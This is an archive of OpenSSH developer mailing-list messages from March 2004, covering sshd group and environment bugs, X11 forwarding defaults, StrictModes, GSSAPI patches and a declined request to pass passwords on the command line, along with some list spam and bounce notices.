localhost id -Gn >> id: cannot find name for group ID 201 >> id: cannot find name for group ID 2039 >> OA3 201 2039 > > > > >> The group my account belongs to is OA3, groups 201 and 2039 do not >> exist.. >> (a normal login or su, and 'id -Gn' works as expected) > > > What about running, eg, inetd/telnetd under daemontools? > >> It turns out that when I run sshd standalone (debug), it works fine - >> only when run under the supervise command I see the strange extra >> groups. > > > To clarify: running sshd as a stand-alone daemon (ie "sshd" with no > options) *and* with debugging (ie "sshd -ddd") both work correctly? > >> This is not related to SSH privilege separation, the install is >> correct and works fine with respect to the sshd privilege separation >> user. (I've > > > looked through the strace output). > >> >> Between different user accounts, the problem occurs often with the >> exact same behavior, >> but for some there is only one different extra group ID, or none at all. > > > You always get the same behaviour with the same accounts? What do the > users exhibiting these symptoms have in common? Do those groups exist > in /etc/group or the gid field of /etc/passwd? > >> Is this a known problem? > > > Not that I know of. > > [...] > From postadal at suse.cz Tue Mar 9 02:21:08 2004 From: postadal at suse.cz (Petr Ostadal) Date: Mon, 8 Mar 2004 16:21:08 +0100 (CET) Subject: environ problem in 3.8p1 In-Reply-To: <404C4DF5.7000800@zip.com.au> References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> Message-ID: Is any safe way how to forward LANG and LC_* environ variables from client to remote? I have problem with utf8<->not utf8 terminals ;(. Petr On Mon, 8 Mar 2004, Darren Tucker wrote: > John P. Rouillard wrote: > > I would suggest not blanking "a couple of environment variables", but > > passing only a the environment variables you need and > > blanking/removing all the rest. > > At the moment, only specific environment variables are copied from the > daemon's environment to the child's. KRB5CCNAME is an odd case because > on AIX it might be set by the auth process itself, and the issue is if > it's set in root's environment but not overridden during the login process. > > > It's just safer since you never know > > what variables could be used for an exploit later. > > The environment variables in question are those inherited from root's > environment at daemon startup, users don't get to fiddle with them. > > -- > Darren Tucker (dtucker at zip.com.au) > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > Good judgement comes with experience. Unfortunately, the experience > usually comes from bad judgement. > > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > From cjwatson at debian.org Wed Mar 10 02:44:20 2004 From: cjwatson at debian.org (Colin Watson) Date: Tue, 9 Mar 2004 15:44:20 +0000 Subject: ForwardX11Trusted Message-ID: <20040309154420.GA2596@riva.ucam.org> Since packaging OpenSSH 3.8p1 for Debian, I've got a flood of bug reports and confusion about the new untrusted X client configuration. At least part of this seems to be the short (2 minutes!) timeout on the cookie, so that if you're impatient like me and open a connection to a machine that takes a little while to do the key exchange, go off and do something in another window in the meantime, and then come back when it's finished, you may well find that the untrusted cookie's expired in the meantime. This seems a bit excessive. Would anyone think I was crazy for defaulting to ForwardX11Trusted in our OpenSSH package for a while until this becomes more mature? At least then we don't regress. -- Colin Watson [cjwatson at flatline.org.uk] From v_t_m at seznam.cz Wed Mar 10 07:35:45 2004 From: v_t_m at seznam.cz (=?iso-8859-2?Q?V=E1clav=20Tomec?=) Date: Tue, 09 Mar 2004 21:35:45 +0100 (CET) Subject: New version of SecurID auth and AuthSelection available Message-ID: <1311265.3384842-21969-89808324-1078864545@seznam.cz> Hello all, the new versions of AuthSelection and SecurID patches are available for OpenSSH 3.8p1. securid-1 at ssh.com authentication was removed. I've made the logging patch too, it is based on sftplogging patch with some modifications and mainly !! scp logging !! is added. Look at: http://sweb.cz/v_t_m/ Vaclav ____________________________________________________________ Obchodn? d?m.cz - ?irok? sortiment dom?c?ch spot?ebi?? a elektroniky, v?razn? slevy. Nav?tivte http://www.obchodni-dum.cz/index.phtml?prov=59 From djm at mindrot.org Wed Mar 10 07:57:19 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 10 Mar 2004 07:57:19 +1100 (EST) Subject: ForwardX11Trusted In-Reply-To: <20040309154420.GA2596@riva.ucam.org> References: <20040309154420.GA2596@riva.ucam.org> Message-ID: On Tue, 9 Mar 2004, Colin Watson wrote: > Since packaging OpenSSH 3.8p1 for Debian, I've got a flood of bug > reports and confusion about the new untrusted X client configuration. > > At least part of this seems to be the short (2 minutes!) timeout on the > cookie, so that if you're impatient like me and open a connection to a > machine that takes a little while to do the key exchange, go off and do > something in another window in the meantime, and then come back when > it's finished, you may well find that the untrusted cookie's expired in > the meantime. This seems a bit excessive. Markus is looking at this. > Would anyone think I was crazy for defaulting to ForwardX11Trusted in > our OpenSSH package for a while until this becomes more mature? At least > then we don't regress. Some of the maturing needs to happen in the X11 server libraries, toolkits and applications as well. The X11 server libraries have fixed, but very coarse security policy for what actions an untrusted connection can perform. The toolkits and applications need to stop blindly assuming that every action is possible. -d From listguy at transientresearch.com Wed Mar 10 18:53:19 2004 From: listguy at transientresearch.com (JD Cole) Date: Tue, 09 Mar 2004 23:53:19 -0800 Subject: MAN pages: authorized_keys Message-ID: <404EC96F.5070901@transientresearch.com> Howdy, I would like to suggest a change in the ssh documentation for the use of authorized_keys. The man page states: This file is not highly sensitive, but the recommended permissions are read/write for the user, and not accessible by others. I'm may be knit picking, but it could be read that, while not recommended, it is possible to allow access to the authorized_keys file to other users. It seems that this is not the case as an athorized_keys file with group write permissions cause ssh to fall back on manual login. How about: This file is not highly sensitive, but ssh requires that the file is only writable by the user. Please correct me if I am mistaken, JD From dtucker at zip.com.au Wed Mar 10 18:41:48 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 10 Mar 2004 18:41:48 +1100 Subject: MAN pages: authorized_keys In-Reply-To: <404EC96F.5070901@transientresearch.com> References: <404EC96F.5070901@transientresearch.com> Message-ID: <404EC6BC.6010908@zip.com.au> JD Cole wrote: > I would like to suggest a change in the ssh documentation for the use > of authorized_keys. The man page states: > > This file is not highly sensitive, but the recommended permissions are > read/write for the user, and not accessible by others. > > I'm may be knit picking, but it could be read that, while not > recommended, it is possible to allow access to the authorized_keys file > to other users. It seems that this is not the case as an athorized_keys > file with group write permissions cause ssh to fall back on manual login. That actually depends on the setting of StrictModes in sshd_config. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From listguy at transientresearch.com Wed Mar 10 19:57:21 2004 From: listguy at transientresearch.com (JD Cole) Date: Wed, 10 Mar 2004 00:57:21 -0800 Subject: MAN pages: authorized_keys In-Reply-To: <404EC6BC.6010908@zip.com.au> References: <404EC96F.5070901@transientresearch.com> <404EC6BC.6010908@zip.com.au> Message-ID: <404ED871.6050608@transientresearch.com> Does the StrictModes apply to all files in the users directory, or just the ssh config files (normally .ssh/)? Just trying to figure out the scope of StrictModes.... JD Darren Tucker wrote: > JD Cole wrote: > >> I would like to suggest a change in the ssh documentation for the >> use of authorized_keys. The man page states: >> >> This file is not highly sensitive, but the recommended permissions >> are read/write for the user, and not accessible by others. >> >> I'm may be knit picking, but it could be read that, while not >> recommended, it is possible to allow access to the authorized_keys >> file to other users. It seems that this is not the case as an >> athorized_keys file with group write permissions cause ssh to fall >> back on manual login. > > > That actually depends on the setting of StrictModes in sshd_config. > From markus at openbsd.org Wed Mar 10 19:10:54 2004 From: markus at openbsd.org (Markus Friedl) Date: Wed, 10 Mar 2004 09:10:54 +0100 Subject: ForwardX11Trusted In-Reply-To: <20040309154420.GA2596@riva.ucam.org> References: <20040309154420.GA2596@riva.ucam.org> Message-ID: <20040310081054.GA13864@folly> On Tue, Mar 09, 2004 at 03:44:20PM +0000, Colin Watson wrote: > At least part of this seems to be the short (2 minutes!) timeout on the > cookie, so that if you're impatient like me and open a connection to a I've changed this to 20 minutes. 1 minute is the default in xauth, and 2 minutes would be appropriate for ssh -f host xapp style forwarding. From dtucker at zip.com.au Wed Mar 10 19:45:07 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 10 Mar 2004 19:45:07 +1100 Subject: MAN pages: authorized_keys In-Reply-To: <404ED871.6050608@transientresearch.com> References: <404EC96F.5070901@transientresearch.com> <404EC6BC.6010908@zip.com.au> <404ED871.6050608@transientresearch.com> Message-ID: <404ED593.5060309@zip.com.au> JD Cole wrote: > Does the StrictModes apply to all files in the users directory, or just > the ssh config files (normally .ssh/)? Just trying to figure out the > scope of StrictModes.... StrictModes causes the SSH config files and their directory components up to and including the user's home directory. See secure_filename in auth.c. For /home/dtucker/.ssh/authorized_keys, "authorized_keys", ".ssh" and "dtucker" would be checked, but no other files or directories. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From Sergio.Gelato at astro.su.se Wed Mar 10 21:40:02 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Wed, 10 Mar 2004 11:40:02 +0100 Subject: ForwardX11Trusted In-Reply-To: References: <20040309154420.GA2596@riva.ucam.org> Message-ID: <20040310104001.GD1059@hanuman.astro.su.se> * Damien Miller [2004-03-10 07:57:19 +1100]: > On Tue, 9 Mar 2004, Colin Watson wrote: > > Since packaging OpenSSH 3.8p1 for Debian, Nice. I did my own private packaging (targeting woody) and should probably compare with yours. > > Would anyone think I was crazy for defaulting to ForwardX11Trusted in > > our OpenSSH package for a while until this becomes more mature? At least > > then we don't regress. I've come to the same conclusion for my site: we need ForwardX11Trusted on by default, to keep users from putting it in their own .ssh/config files (or shell aliases; real users tend to be more familiar with shell aliases than with .ssh/config) where we can't easily turn it back off once the problems are solved. > Some of the maturing needs to happen in the X11 server libraries, > toolkits and applications as well. > > The X11 server libraries have fixed, but very coarse security policy Actually, the security policy is configurable. It's just that the default configuration needs shaking up a bit to make it work well with a number of applications. We've seen problems with gv and (intermittently) with xterm. Also with PyRAF (i.e. in all likelihood with Python's Tkinter module). > for what actions an untrusted connection can perform. The toolkits and > applications need to stop blindly assuming that every action is possible. > > -d > > From MAILER-DAEMON at mailout2.pacific.net.au Thu Mar 11 02:23:31 2004 From: MAILER-DAEMON at mailout2.pacific.net.au (Mail Delivery Subsystem) Date: Thu, 11 Mar 2004 02:23:31 +1100 Subject: Warning: could not send message for past 4 hours Message-ID: <200403101523.i2ADEPo6012216@mailout2.pacific.net.au> A non-text attachment was scrubbed... Name: not available Type: text/rfc822-headers Size: 1265 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040311/178174f2/attachment.bin From l45wang at shoshin.uwaterloo.ca Thu Mar 11 05:49:05 2004 From: l45wang at shoshin.uwaterloo.ca (Lixiao Wang) Date: Wed, 10 Mar 2004 13:49:05 -0500 Subject: a quick help Message-ID: <004c01c406d0$5d010a50$0d696181@boyne> Dear Sir/Madam, I am a Ph.D. student in Computer Science of the University of Waterloo, Canada. I'm currently taking a graduate level course, software architecture, offered by Dr. Ric Holt. Our group is interested in OpenSSH and we are studying the evolution of OpenSSH. I'm wondering if it is possible that you can provide us with some architectural information of OpenSSH, such as the design architecture, how many high-level components in the system and what are they, etc. It'll be great help on our project. Your warm-hearted help is highly appreciated. Thanks again for your time, Best Regards, Lixiao Wang From stuge-openssh-unix-dev at cdy.org Thu Mar 11 06:02:30 2004 From: stuge-openssh-unix-dev at cdy.org (Peter Stuge) Date: Wed, 10 Mar 2004 20:02:30 +0100 Subject: a quick help In-Reply-To: <004c01c406d0$5d010a50$0d696181@boyne> References: <004c01c406d0$5d010a50$0d696181@boyne> Message-ID: <20040310190230.GE7467@foo.birdnet.se> On Wed, Mar 10, 2004 at 01:49:05PM -0500, Lixiao Wang wrote: > I'm currently taking a graduate level course, software architecture, > offered by Dr. Ric Holt. Our group is interested in OpenSSH and we > are studying the evolution of OpenSSH. I'm wondering if it is possible > that you can provide us with some architectural information of OpenSSH, > such as the design architecture, how many high-level components in the > system and what are they, etc. Yes, it's possible, but it's not very likely. Use the source. //Peter From mouring at etoh.eviladmin.org Thu Mar 11 06:47:02 2004 From: mouring at etoh.eviladmin.org (Ben Lindstrom) Date: Wed, 10 Mar 2004 13:47:02 -0600 (CST) Subject: a quick help In-Reply-To: <20040310190230.GE7467@foo.birdnet.se> Message-ID: On Wed, 10 Mar 2004, Peter Stuge wrote: > On Wed, Mar 10, 2004 at 01:49:05PM -0500, Lixiao Wang wrote: > > I'm currently taking a graduate level course, software architecture, > > offered by Dr. Ric Holt. Our group is interested in OpenSSH and we > > are studying the evolution of OpenSSH. I'm wondering if it is possible > > that you can provide us with some architectural information of OpenSSH, > > such as the design architecture, how many high-level components in the > > system and what are they, etc. > > Yes, it's possible, but it's not very likely. Use the source. > > I would say look in the *.tar.gz file for: OVERVIEW RFC.nroff Along with the RFC on the secsh (which I don't have a link of off hand). and the following for the privilege seperation aspects: http://niels.xtdnet.nl/ssh/privsep.html http://niels.xtdnet.nl/papers/privsep.pdf Would love to get my hands on Unisys' old "Re-engineering" program that drew pretty diagrams and translated the code base into a nice meta language, but I doubt anyone would give me it since it is.. oh.. A few million dollar program. Not saying it would be useful, but would be fun to see. - Ben From dtucker at zip.com.au Thu Mar 11 10:13:07 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Thu, 11 Mar 2004 10:13:07 +1100 Subject: a quick help In-Reply-To: References: Message-ID: <404FA103.6030109@zip.com.au> Ben Lindstrom wrote: > Along with the RFC on the secsh (which I don't have a link of off hand). http://www.ietf.org/html.charters/secsh-charter.html -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From djm at mindrot.org Thu Mar 11 10:38:32 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 11 Mar 2004 10:38:32 +1100 Subject: a quick help In-Reply-To: <004c01c406d0$5d010a50$0d696181@boyne> References: <004c01c406d0$5d010a50$0d696181@boyne> Message-ID: <404FA6F8.4040308@mindrot.org> Lixiao Wang wrote: > Dear Sir/Madam, > > I am a Ph.D. student in Computer Science of the University of Waterloo, > Canada. I'm currently taking a graduate level course, software architecture, > offered by Dr. Ric Holt. Our group is interested in OpenSSH and we are > studying the evolution of OpenSSH. I'm wondering if it is possible that you > can provide us with some architectural information of OpenSSH, such as the > design architecture, how many high-level components in the system and what > are they, etc. It'll be great help on our project. Your warm-hearted help is > highly appreciated. There is no high-level design documentation other than the protocol description in the IETF secsh internet-draft. Like many free software products, OpenSSH has evolved based on activities predominatly performed by individuals (mainly Markus). As far as architectural components, they are pretty much seperated by file. Some the more important ones in ssh & sshd are: - The logging routines - The buffer code, implementing dynamic buffers which are used extensively through OpenSSH - The generic cipher/MAC code - The packet code, used to build/parse packets to/from the wire - The dispatch system, that implements a generic message handler - The client/server loops (the main loop of both ssh and sshd) - The authentication method system - The KEX (key exchange) code - The channels code, used for sessions and port-forwarding (a state-machine lives here) - The privsep architecture, best documented in Niels' paper (another state-machine is used here) - The session code, which handles shell/command session setup and teardown Because the protocol is the same, much code is reused between the client and the server. I may have missed a couple of bits, but this is the guts of ssh and sshd. Most of these live in files with names similar to their functions. What is the nature of your project? Would you be willing to share the results when you are done? Regards, Damien Miller From djm at mindrot.org Thu Mar 11 11:49:04 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 11 Mar 2004 11:49:04 +1100 Subject: Test Message-ID: <404FB780.1010607@mindrot.org> Testing some more anti-spam measures. Please ignore. -d From djm at mindrot.org Thu Mar 11 11:50:12 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 11 Mar 2004 11:50:12 +1100 Subject: Testing again Message-ID: <404FB7C4.5090402@mindrot.org> Apologies From djm at mindrot.org Thu Mar 11 13:19:43 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 11 Mar 2004 13:19:43 +1100 Subject: environ problem in 3.8p1 In-Reply-To: References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> Message-ID: <404FCCBF.8040402@mindrot.org> Petr Ostadal wrote: > Is any safe way how to forward LANG and LC_* environ variables from client > to remote? I have problem with utf8<->not utf8 terminals ;(. No, the protocol does not include a way to transmit more than the terminal type ($TERM). Changing SSH protocol 1is out of the question, but perhaps another version of "pty-req" that transfers environment variables could be possible. I doubt that this would happen soon. Doing this right would be tricky - the ability to set arbitrary environment variables would have security implications (e.g. setting LD_PRELOAD before a restricted shell is executed). -d From djm at mindrot.org Thu Mar 11 20:07:46 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 11 Mar 2004 20:07:46 +1100 (EST) Subject: environ problem in 3.8p1 In-Reply-To: <404FCCBF.8040402@mindrot.org> References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> <404FCCBF.8040402@mindrot.org> Message-ID: In his ignorance, on Thu, 11 Mar 2004, Damien Miller mistakenly wrote: > No, the protocol does not include a way to transmit more than the > terminal type ($TERM). Markus pointed out that I am wrong: protocol 2 has a request to pass environment variables, which we don't implement. -d From sfrost at snowman.net Fri Mar 12 05:12:45 2004 From: sfrost at snowman.net (Stephen Frost) Date: Thu, 11 Mar 2004 13:12:45 -0500 Subject: GSSAPI support in 3.8 ? In-Reply-To: References: <4043381F.4010305@zip.com.au> Message-ID: <20040311181245.GI7060@ns.snowman.net> * sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk) wrote: > I've now completed testing some minimal patches for backwards > compatibility. They're attached to this email. Please note that these > patches are made available purely for the purpose of simplifying the > migration path - new users should have no need for them. Instructions for > their use are at the beginning of the patch. Many thanks Simon. I'm looking into using this patch to provide a migration path for Debian users moving from the old ssh-krb5 package (which was ssh with your GSSAPI patches) to current ssh (3.8). Two quick questions- first, what are your feelings about the patch? Do you think it's stable/usable enough to be distributed widely? The default will be off with a note about how to turn it on to interoperate with other systems. Second, does the GSSAPI in 3.8 do everything your older GSSAPI patches did? From what I've seen it looks like they do but I'd like to make sure- server verification using Kerberos (external-keyx?), ticket forwarding, etc? Many thanks, Stephen -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040311/7928a331/attachment.bin From dtucker at zip.com.au Fri Mar 12 23:37:13 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 12 Mar 2004 23:37:13 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: <4051AEF9.7090702@zip.com.au> Roger Cornelius wrote: > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c and causes logins to occur in > GMT time. It also causes any sshd syslog messages to be written in GMT > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > all platforms. Am I missing something? I haven't seen it reported > before. That was an attempt to fix issues with certain authentication types on AIX, but it causes other problems, as you found. The change has been backed out, and an alternative fix for the AIX issues has been implemented. (Both will be in the next release, and are in the snapshots now). Thanks for the report. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From rac at tenzing.org Sat Mar 13 02:29:47 2004 From: rac at tenzing.org (Roger Cornelius) Date: Fri, 12 Mar 2004 10:29:47 -0500 Subject: environ problem in 3.8p1 In-Reply-To: <4051AEF9.7090702@zip.com.au> References: <200403022129.i22LTW517908@tenzing.org> <4051AEF9.7090702@zip.com.au> Message-ID: <20040312152947.GC8135@tenzing.org> On Fri Mar 12 23:37, Darren Tucker wrote: > Roger Cornelius wrote: > > >3.8p1 added the following to main() in sshd.c: > > > >#ifndef HAVE_CYGWIN > > /* Clear environment */ > > environ[0] = NULL; > >#endif > > > >This breaks the getenv("TZ") in session.c and causes logins to occur in > >GMT time. It also causes any sshd syslog messages to be written in GMT > >time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > >all platforms. Am I missing something? I haven't seen it reported > >before. > > That was an attempt to fix issues with certain authentication types on > AIX, but it causes other problems, as you found. The change has been > backed out, and an alternative fix for the AIX issues has been > implemented. (Both will be in the next release, and are in the > snapshots now). > > Thanks for the report. No problem. Thank you, and all the ssh team, for continuing to develop openssh, and continuing to support SCO, despite their current litigation attempts. Roger From cards at ericsalo.com Sat Mar 13 08:48:34 2004 From: cards at ericsalo.com (Eric Salo) Date: Sat, 13 Mar 2004 05:48:34 +0800 Subject: Free unlimited graphic design of business cards Message-ID: <313548.ICGOYPES@ericsalo.com> Hi Friend, I received your email from an opt-in list I purchased. If you are unhappy about receiving this email, I sincerely apologize. I bought the database in good faith and I hope my offer interests you. According to the list you are a small business owner or otherwise involved in a management position. I wonder if that's true? I am offering you a genuine opportunity to have your cards designed by a design studio with nine years of experience - totally free of charge. Our normal fee for design is $88 per hour and this deal includes unlimited design time when you get the color printing from us as well. (See the web site for details of my 100% money-back guarantee.) If you are interested you can view the complete offer at http://business-cards.ericsalo.com Please have a good read through the website as it really is an incredible opportunity :) Sincerely yours, Eric If you're not interested in printing or graphic design specials I am very sorry to have disturbed you. To unsubscribe simply send an email to remove at ericsalo.com and you will never receive an email from me again. By the way, if you are unsubscribing please be sure to mention the email below as that is the one we have on file for you: openssh-unix-dev at mindrot.org From dtucker at zip.com.au Sat Mar 13 08:57:10 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 13 Mar 2004 08:57:10 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <20040312152947.GC8135@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> <4051AEF9.7090702@zip.com.au> <20040312152947.GC8135@tenzing.org> Message-ID: <40523236.1010800@zip.com.au> Roger Cornelius wrote: > No problem. Thank you, and all the ssh team, for continuing to develop > openssh, and continuing to support SCO, despite their current litigation > attempts. The OpenSSH project goal [1] is "all operating systems should ship with support for the SSH". There's no exception for operating systems from litigant vendors. That said, I personally do not agree with their actions, and believe that they're doing even more of a disservice to their user base (ie customers!) than to the rest of the community. (Note to readers: This is not an invitation to flood openssh-unix-dev on this topic, anyone wishing to follow up should do so via private email.) [1] http://www.openssh.com/goals.html -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From postmaster at lua.unilestemg.br Sun Mar 14 21:48:48 2004 From: postmaster at lua.unilestemg.br (postmaster at lua.unilestemg.br) Date: 14 Mar 2004 10:48:48 -0000 Subject: Virus Removido Message-ID: <20040314104848.28873.qmail@lua.unilestemg.br> V I R U S R E M O V I D O Foi encontrado um virus em seu email e o mesmo foi removido. Atualize seu antivirus e verifique seu sistema. _________________________ Webmaster - UnilesteMG webmaster at unilestemg.br Tel. (031) 38467936 From martin at elxsi.de Mon Mar 15 03:55:13 2004 From: martin at elxsi.de (Martin Kluge) Date: Sun, 14 Mar 2004 17:55:13 +0100 Subject: Feature request Message-ID: <20040314165513.GB11417@elxsi.de> Hi, I have a small problem, I want to specify the SSH password via the command line: root at bla:~# ssh -dmypassword user at host I know this is insecure and normally it is better to use key based authentication to log into the remote system without specifying a password, but in my case, this is not a possibility. So would you accept a patch to add a new command line option (suggestion: -d) to specify a password directly on the command line? This option would of course only be enabled if the configure script has been called with a special option (--with-insecure-cl-pass for example). We also could use a ":" to separate the username and the password: root at bla:~# ssh -l user:password host Please reply off-list, because I'm not subscribed. Thank you, Martin Kluge -- Name : Martin Kluge email : martin at elxsi.info Phone : +49 160 1515182 Projects : http://www.aa-security.de GPG Key : http://www.elxsi.de/key.pub -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040314/1d2d9008/attachment.bin From stuge-openssh-unix-dev at cdy.org Mon Mar 15 04:48:35 2004 From: stuge-openssh-unix-dev at cdy.org (Peter Stuge) Date: Sun, 14 Mar 2004 18:48:35 +0100 Subject: Feature request In-Reply-To: <20040314165513.GB11417@elxsi.de> References: <20040314165513.GB11417@elxsi.de> Message-ID: <20040314174835.GA10974@foo.birdnet.se> On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > So would you accept a patch to add a new command line option > (suggestion: -d) to specify a password directly on the command line? This has been requested before but declined because it promotes insecure behavior. (Your system may be isolated, but all aren't and it's usually possible to see any arguments of all processes in the system.) I seem to remember discussion about accepting the password on a file descriptor however. Search the mailing list and bugzilla.mindrot.org. //Peter From martin at elxsi.de Mon Mar 15 05:23:54 2004 From: martin at elxsi.de (Martin Kluge) Date: Sun, 14 Mar 2004 19:23:54 +0100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <20040314182354.GA26324@elxsi.de> Hi, On Sun, Mar 14, 2004 at 06:48:35PM +0100, Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > > So would you accept a patch to add a new command line option > > (suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) Well, of course. But: This feature can be enabled (disabled per default) at compile time, so I think, everyone who enables this feature knows what he's doing. > > I seem to remember discussion about accepting the password on a file > descriptor however. Search the mailing list and bugzilla.mindrot.org. This would be a possibility too, I'll have a look at it. Thank you, Martin > > > //Peter -- Name : Martin Kluge email : martin at elxsi.info Phone : +49 160 1515182 Projects : http://www.aa-security.de GPG Key : http://www.elxsi.de/key.pub -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040314/deb1c289/attachment.bin From markus at openbsd.org Mon Mar 15 05:48:43 2004 From: markus at openbsd.org (Markus Friedl) Date: Sun, 14 Mar 2004 19:48:43 +0100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <20040314184842.GA29132@folly> On Sun, Mar 14, 2004 at 06:48:35PM +0100, Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: > > So would you accept a patch to add a new command line option > > (suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) yes, but you can abuse SSH_ASKPASS for this. From openssh at roumenpetrov.info Mon Mar 15 23:10:06 2004 From: openssh at roumenpetrov.info (Roumen Petrov) Date: Mon, 15 Mar 2004 14:10:06 +0200 Subject: Feature request In-Reply-To: <20040314165513.GB11417@elxsi.de> References: <20040314165513.GB11417@elxsi.de> Message-ID: <40559D1E.10800@roumenpetrov.info> Hi Martin, check this: "http://expect.nist.gov/FAQ.html#q1" Martin Kluge wrote: >Hi, > >I have a small problem, I want to specify the SSH password via the command >line: > > >root at bla:~# ssh -dmypassword user at host > >[SNIP] > >Thank you, >Martin Kluge > > From postadal at suse.cz Tue Mar 2 03:41:24 2004 From: postadal at suse.cz (Petr Ostadal) Date: Mon, 1 Mar 2004 17:41:24 +0100 (CET) Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: Hi, I tested 3.8p1 and it seems that pam_krb5 has been working without threads already. I think the bug can be close for 3.8p1. Petr On Mon, 1 Mar 2004, Petr Ostadal wrote: > Hi all, > > I don't like continue this flame if we have or haven't the threads. > > I ask, how can solve problems which forking have (see bug > ttp://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the > pam_krb5 and others pam modules doesn't work (in bugs is nicely described > where is the problems). > > Thnx in advance for your answer. > > Petr > > -- > Best Regards, > > Petr Ostadal > Software Developer > --------------------------------------------------------------------- > SuSE CR, s.r.o. e-mail: postadal at suse.cz > Drahobejlova 27 tel: +420 296 542 382 > 190 00 Praha 9 fax: +420 296 542 374 > Czech Republic http://www.suse.cz > > On Mon, 1 Mar 2004, Damien Miller wrote: > > > I've been away from mail for a couple of days, so I am catching up on this > > rather amusing thread. > > > > On Sat, 28 Feb 2004, John Davidorff Pell wrote: > > > > > I'm not terribly interested in having threads or not having threads, it > > > was the This Will Never Happen Because I Say So And Am G-d attitude > > > that shocked me. > > > > It isn't because "I" say so - you are making incorrect assumptions. For > > instance, if I just did what I wanted, threads would have been removed by > > now (and probably a bit more too). > > > > I am quite sure that I speak for all the developers when I say that we > > don't want threads used in OpenSSH. > > > > -d > > > > _______________________________________________ > > openssh-unix-dev mailing list > > openssh-unix-dev at mindrot.org > > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > > > From dtucker at zip.com.au Tue Mar 16 13:45:12 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 16 Mar 2004 13:45:12 +1100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <40566A38.4030600@zip.com.au> Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: >>So would you accept a patch to add a new command line option >>(suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) > > I seem to remember discussion about 